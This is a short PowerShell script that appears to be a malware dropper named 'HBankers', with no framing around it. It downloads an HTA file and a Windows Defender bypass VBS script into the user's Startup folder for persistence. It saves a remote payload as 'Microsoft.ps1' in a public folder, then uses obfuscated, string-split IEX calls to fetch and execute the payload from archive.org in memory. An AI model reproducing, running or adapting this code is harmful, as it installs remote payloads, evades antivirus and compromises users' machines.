Function HBankers
{
$p = 'C:\Users\' + $env:UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
$ps1 = 'C:\Users\Public\'


start-sleep -s 5

if((New-Object System.Net.WebClient).DownloadFile('https://www.edenoakshealthcare.com/Account/Startup.txt', $p + 'B.hta')){
}
start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/master/script.vbs', $p + 'A.vbs')){
}
start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://ia601508.us.archive.org/13/items/a-1x-4e-8-s-863ka-5-kk-1f-ycy-6b-q-ll/A1x4e8S863ka5Kk1fYCy6bQ%3D%3DLL.txt' , $ps1 + 'Microsoft.ps1')){
}
$c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''https://ia601508.us.archive.org/13/items/a-1x-4e-8-s-863ka-5-kk-1f-ycy-6b-q-ll/A1x4e8S863ka5Kk1fYCy6bQ%3D%3DLL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
}
IEX HBankers